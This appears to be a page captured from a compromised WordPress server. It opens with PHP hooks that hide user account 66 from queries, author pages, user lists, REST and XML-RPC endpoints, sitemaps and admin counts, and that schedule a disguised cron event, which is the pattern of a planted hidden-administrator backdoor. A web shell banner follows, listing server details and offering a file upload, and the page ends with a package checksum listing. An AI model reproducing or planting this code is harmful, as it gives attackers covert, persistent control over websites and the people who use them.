add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
48ba2b71dfa8c763bb7707a2369e959f usr/lib/python3/dist-packages/deb822.py 72bbbcaffd95f231806bf73edc16b946 usr/lib/python3/dist-packages/debian/__init__.py 421bbe61ca85d76cce0c25f1e6742bab usr/lib/python3/dist-packages/debian/_arch_table.py 348cb173c66443402417179283a699aa usr/lib/python3/dist-packages/debian/_deb822_repro/__init__.py d3ae10c87a4d0af8738d48a77d93f7d3 usr/lib/python3/dist-packages/debian/_deb822_repro/_util.py 0068c5612a15a98fc7aee53f57b25120 usr/lib/python3/dist-packages/debian/_deb822_repro/formatter.py fc50d4c07abb11f58784fe07b5d435a4 usr/lib/python3/dist-packages/debian/_deb822_repro/parsing.py 33efacb63d65bfd06a6bee8d15ac28f4 usr/lib/python3/dist-packages/debian/_deb822_repro/tokens.py 341c5821424c6066edd810e8f927f396 usr/lib/python3/dist-packages/debian/_deb822_repro/types.py 10e4bc46ed021f9b807c1d519b7e4436 usr/lib/python3/dist-packages/debian/_util.py 6f84b1283de5cc688925b0aaa492714a usr/lib/python3/dist-packages/debian/_version.py 2466db3309143ee84a6b17b1626f877b usr/lib/python3/dist-packages/debian/arfile.py 2ee15ca8ffc1e2648ff73e0cafee9441 usr/lib/python3/dist-packages/debian/changelog.py 4d452a1d8c443581adb45b96974fc111 usr/lib/python3/dist-packages/debian/copyright.py 2cc58bacbf2bd59f722876884989e879 usr/lib/python3/dist-packages/debian/deb822.py e28b64d479df871a6538db56bd15d17c usr/lib/python3/dist-packages/debian/debfile.py 9f7414fda7fedf0dedb45657dc439c18 usr/lib/python3/dist-packages/debian/debian_support.py d1510eefa5dc6b6b6193428d0df12cd5 usr/lib/python3/dist-packages/debian/debtags.py 501be03e991ab45252f7e542c74ce96f usr/lib/python3/dist-packages/debian/deprecation.py d41d8cd98f00b204e9800998ecf8427e usr/lib/python3/dist-packages/debian/py.typed dd0db7d6339b981b363dcc893ed4f786 usr/lib/python3/dist-packages/debian/substvars.py eb03bc9eb29659f714bf9a0014f9ffe4 usr/lib/python3/dist-packages/debian/watch.py f670ee8b3581f8bf326d08997242b267 usr/lib/python3/dist-packages/debian_bundle/__init__.py 1cfc467a3d0f726260da4c98c93e2261 usr/lib/python3/dist-packages/python_debian-0.1.49+ubuntu2.egg-info/PKG-INFO 68b329da9893e34099c7d8ad5cb9c940 usr/lib/python3/dist-packages/python_debian-0.1.49+ubuntu2.egg-info/dependency_links.txt d41d8cd98f00b204e9800998ecf8427e usr/lib/python3/dist-packages/python_debian-0.1.49+ubuntu2.egg-info/requires.txt ace9a1af416808019c09d3b71b061348 usr/lib/python3/dist-packages/python_debian-0.1.49+ubuntu2.egg-info/top_level.txt 18b1c701117d186f7b99de6a6287c0ba usr/share/doc/python3-debian/HISTORY.deb822 572c57a1dc1716cf3698df05872ff260 usr/share/doc/python3-debian/NEWS.Debian.gz 8a544f248c4d42876909c5b637d02bb4 usr/share/doc/python3-debian/README.rst f6eadc7cd9c009bde4f5814416ec93dc usr/share/doc/python3-debian/changelog.gz b9325633554e31ce24c5be2345873bed usr/share/doc/python3-debian/copyright 952a97da48405702d40c2360be075eba usr/share/doc/python3-debian/examples/changelog/changelog_to_file 493c5234531ec967fbf2fbdcdf6e32b6 usr/share/doc/python3-debian/examples/changelog/simple_changelog b33b9dce6857c3cfbb2bab6e78899384 usr/share/doc/python3-debian/examples/copyright/check_parse_and_dump.py dac57dbb29f017bea4c737aa828e4bf0 usr/share/doc/python3-debian/examples/deb822/depgraph f6ec57e26322326196c634a8b636c37c usr/share/doc/python3-debian/examples/deb822/grep-maintainer 55dc8a66639ae8ec5c9bb4cb7596b7b2 usr/share/doc/python3-debian/examples/deb822/grep_native_packages.py 5b1b328942d35eeeacd243873f4c63f2 usr/share/doc/python3-debian/examples/deb822/render-dctrl 9b5e4953251ddb0015a4f25a7fa2439b usr/share/doc/python3-debian/examples/debfile/ar bc54fc58edc395639f826fbf09e39074 usr/share/doc/python3-debian/examples/debfile/changelog_head 642bb0a4411c26c9a505fdca4445949c usr/share/doc/python3-debian/examples/debfile/dpkg-info efe581296a0f7f132368b19656ce700b usr/share/doc/python3-debian/examples/debfile/extract_cron 174aebc2ea4cefed2a30121e6dec7a0a usr/share/doc/python3-debian/examples/debtags/pkgwalk 2ade83f9ee79016fb3100ba62977058e usr/share/doc/python3-debian/examples/debtags/reverse 1f4b822dc3be46b3a553d0cbe84f0a1b usr/share/doc/python3-debian/examples/debtags/smartsearch 63415eb5d4c241a881f52864de365aa2 usr/share/doc/python3-debian/examples/debtags/tagminer 0139e508c0262bcda87d70a6f8826a3e usr/share/doc/python3-debian/examples/debtags/tagsbyrelevance d4602caf44765d73defd23f7ccb0effa usr/share/lintian/overrides/python3-debian